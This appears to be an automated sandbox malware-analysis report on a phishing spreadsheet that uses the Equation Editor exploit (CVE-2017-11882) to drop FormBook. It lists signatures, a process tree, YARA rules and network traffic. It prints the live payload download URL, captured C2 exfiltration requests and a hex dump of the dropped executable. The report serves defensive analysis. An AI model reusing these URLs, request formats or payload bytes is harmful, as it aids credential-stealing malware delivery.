Loading ...

Play interactive tourEdit tour

Analysis Report PO11272020.xlsx

Overview

General Information

Sample Name:PO11272020.xlsx
Analysis ID:323718
MD5:c2803754fbf19c0073d2dbf2f0fc3871
SHA1:70b8cad0d3d02eb3dfce050ccaae691e11369416
SHA256:6774d42ba390417c371d6f46316b3ae3c216c80f8a46b9b3f8906fe9f054f219
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Drops PE files to the startup folder
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2436 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2700 cmdline: 'C:\Users\Public\vbc.exe' MD5: 0E7D12AD28411F68D62D3D3F17382B98)
      • vbc.exe (PID: 2776 cmdline: C:\Users\Public\vbc.exe MD5: 0E7D12AD28411F68D62D3D3F17382B98)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • vbc.exe (PID: 3020 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe' MD5: 0E7D12AD28411F68D62D3D3F17382B98)
            • vbc.exe (PID: 3012 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe MD5: 0E7D12AD28411F68D62D3D3F17382B98)
          • chkdsk.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: A01E18A156825557A24A643A2547AA8C)
            • firefox.exe (PID: 1948 cmdline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
          • autochk.exe (PID: 268 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: F88A52EB62019D6A62FDD9E08034DBD8)
          • NETSTAT.EXE (PID: 948 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 32297BB17E6EC700D0FC869F9ACAF561)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9c78:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9ee2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15a05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x154f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15b07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15c7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa8fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1476c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb5f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b877:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c88a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18799:$sqlite3step: 68 34 1C 7B E1
    • 0x188ac:$sqlite3step: 68 34 1C 7B E1
    • 0x187c8:$sqlite3text: 68 38 2A 90 C5
    • 0x188ed:$sqlite3text: 68 38 2A 90 C5
    • 0x187db:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18903:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 46 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        8.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2532, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2700
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 162.251.123.239, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2532, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2532, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2700
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2532, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2700
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2532, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2700

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://amachichywsdyjakelogontothecomputewsrty.ydns.eu/amchdoc/vbc.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO11272020.xlsxVirustotal: Detection: 35%Perma Link
          Source: PO11272020.xlsxReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi
          Source: global trafficDNS query: name: amachichywsdyjakelogontothecomputewsrty.ydns.eu
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.251.123.239:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.251.123.239:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 91.195.241.137:80 -> 192.168.2.22:49167
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Nov 2020 11:15:42 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 26 Nov 2020 18:13:37 GMTETag: "62600-5b50680b5ce8d"Accept-Ranges: bytesContent-Length: 402944Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f5 24 1d e4 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 c2 05 00 00 62 00 00 00 00 00 00 52 e1 05 00 00 20 00 00 00 00 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ff e0 05 00 4f 00 00 00 00 00 06 00 1c 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 06 00 0c 00 00 00 68 e0 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 c1 05 00 00 20 00 00 00 c2 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1c 5e 00 00 00 00 06 00 00 60 00 00 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 24 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 e1 05 00 00 00 00 00 48 00 00 00 02 00 05 00 88 61 00 00 b0 2c 00 00 03 00 00 00 20 00 00 06 38 8e 00 00 30 52 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 11 01 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 16 7d 02 00 00 04 02 16 7d 03 00 00 04 02 16 7d 04 00 00 04 02 16 7d 05 00 00 04 02 22 00 00 00 00 7d 06 00 00 04 02 22 00 00 00 00 7d 07 00 00 04 02 22 00 00 00 00 7d 08 00 00 04 02 22 00 00 00 00 7d 09 00 00 04 02 22 00 00 00 00 7d 0a 00 00 04 02 22 00 00 00 00 7d 0b 00 00 04 02 22 00 00 00 00 7d 0c 00 00 04 02 22 00 00 00 00 7d 0d 00 00 04 02 16 7d 0e 00 00 04 02 16 7d 0f 00 00 04 02 23 00 00 00 00 00 00 00 00 7d 10 00 00 04 02 16 7d 11 00 00 04 02 16 7d 12 00 00 04 02 16 7d 13 00 00 04 02 16 7d 14 00 00 04 02 16 7d 15 00 00 04 02 16 7d 16 00 00 04 02 16 7d 17 00 00 04 02 16 7d 18 00 00 04 02 16 7d 19 00 00 04 02 16 7d 1a 00 00 04 02 16 7d 1b 00 00 04 02 16 7d 1c 00 00 04 02 16 7d 1d 00 00 04 02 14 7d 1f 00 00 04 02 28 10 00 00 0a 00 00 15 28 11 00 00 0a 00 02 28 0e 00 00 06 00 2a 92 00 02 7b 33 00 00 04 28 12 0
          Source: global trafficHTTP traffic detected: GET /zsh/?bF=yL9uBTbbG78KoSpXRM0AXioxGrUEzFPLco0s68NkbehqPfZZENvYiAeYWN1dA1cuKz052A==&hhD4=gXzh_b&sql=1 HTTP/1.1Host: www.gedefo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /zsh/?bF=i/oKhvMZx1zIcgxaF4gHwE4fcf1Ed7aIZ1X+q+iFiuDuW5GIUnLBCT9kDanHyBtFc5puMA==&hhD4=gXzh_b&sql=1 HTTP/1.1Host: www.letstalkop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD9B33F8.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /amchdoc/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: amachichywsdyjakelogontothecomputewsrty.ydns.euConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /zsh/?bF=yL9uBTbbG78KoSpXRM0AXioxGrUEzFPLco0s68NkbehqPfZZENvYiAeYWN1dA1cuKz052A==&hhD4=gXzh_b&sql=1 HTTP/1.1Host: www.gedefo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /zsh/?bF=i/oKhvMZx1zIcgxaF4gHwE4fcf1Ed7aIZ1X+q+iFiuDuW5GIUnLBCT9kDanHyBtFc5puMA==&hhD4=gXzh_b&sql=1 HTTP/1.1Host: www.letstalkop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: amachichywsdyjakelogontothecomputewsrty.ydns.eu
          Source: unknownHTTP traffic detected: POST /zsh/ HTTP/1.1Host: www.gedefo.comConnection: closeContent-Length: 261372Cache-Control: no-cacheOrigin: http://www.gedefo.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gedefo.com/zsh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 46 3d 36 70 78 55 66 33 58 52 59 66 30 4d 6f 52 6f 41 4f 38 34 57 4a 48 38 31 41 34 4d 79 34 6b 61 4b 4f 65 70 4f 31 75 67 2d 54 75 41 76 49 39 51 43 4b 34 33 48 35 67 71 58 4b 61 74 74 59 42 38 64 50 44 41 6c 31 39 69 75 66 61 4d 6f 69 74 5a 64 59 77 54 6a 71 6b 6d 38 6e 68 4b 30 32 54 4b 5f 6b 4d 50 47 74 42 77 6a 49 62 52 78 69 54 34 69 6c 7a 47 71 5a 76 56 78 6c 74 74 67 69 66 58 6f 61 41 7e 41 4c 62 62 44 50 75 4d 74 56 34 4b 30 35 49 44 45 38 6c 79 6c 43 36 41 78 39 55 52 4b 62 54 74 5f 68 30 78 6c 49 37 6f 64 72 42 65 61 4b 34 62 72 51 6d 58 43 31 39 57 39 4a 75 6a 70 6b 48 4a 4c 56 4b 65 6e 57 34 62 39 43 63 6c 6e 6e 68 6b 46 47 2d 49 50 6e 52 32 76 74 35 66 6c 7a 44 4f 73 4f 46 55 39 67 63 72 49 30 33 62 64 47 31 78 55 7e 41 64 4e 57 73 28 6f 68 70 79 73 6c 2d 4c 6a 41 67 4c 50 75 42 77 50 5a 76 59 37 7a 5a 4c 65 68 59 54 4d 37 65 41 45 36 64 53 79 4c 68 49 31 52 6f 77 64 78 58 6d 2d 4c 48 34 69 6e 38 61 65 66 65 53 6e 37 36 78 61 37 6a 43 49 38 6c 4b 33 34 73 59 63 4b 35 53 4b 6f 4a 4c 56 34 73 34 67 72 2d 32 69 35 76 56 30 46 66 4a 54 72 57 55 5a 34 57 30 78 79 44 6a 71 77 63 32 45 78 6c 35 78 4f 35 35 48 61 52 77 79 35 6c 50 6c 73 49 65 49 31 41 62 31 6f 49 62 47 75 7a 56 78 34 6e 5a 4a 6c 4b 51 64 67 48 6b 32 4d 2d 37 7a 69 76 58 79 54 68 65 4a 33 37 57 39 49 48 7a 49 77 33 6e 68 66 77 49 67 47 34 71 54 45 2d 36 68 61 41 39 73 63 4d 59 55 41 63 39 79 6e 53 67 57 56 67 46 53 61 35 67 38 41 6c 73 4f 64 33 5a 6a 70 66 42 47 4d 38 4c 66 70 45 6b 55 6a 46 52 48 28 75 31 4a 63 6e 43 76 36 4e 28 64 37 39 73 65 50 4e 33 61 67 50 34 34 61 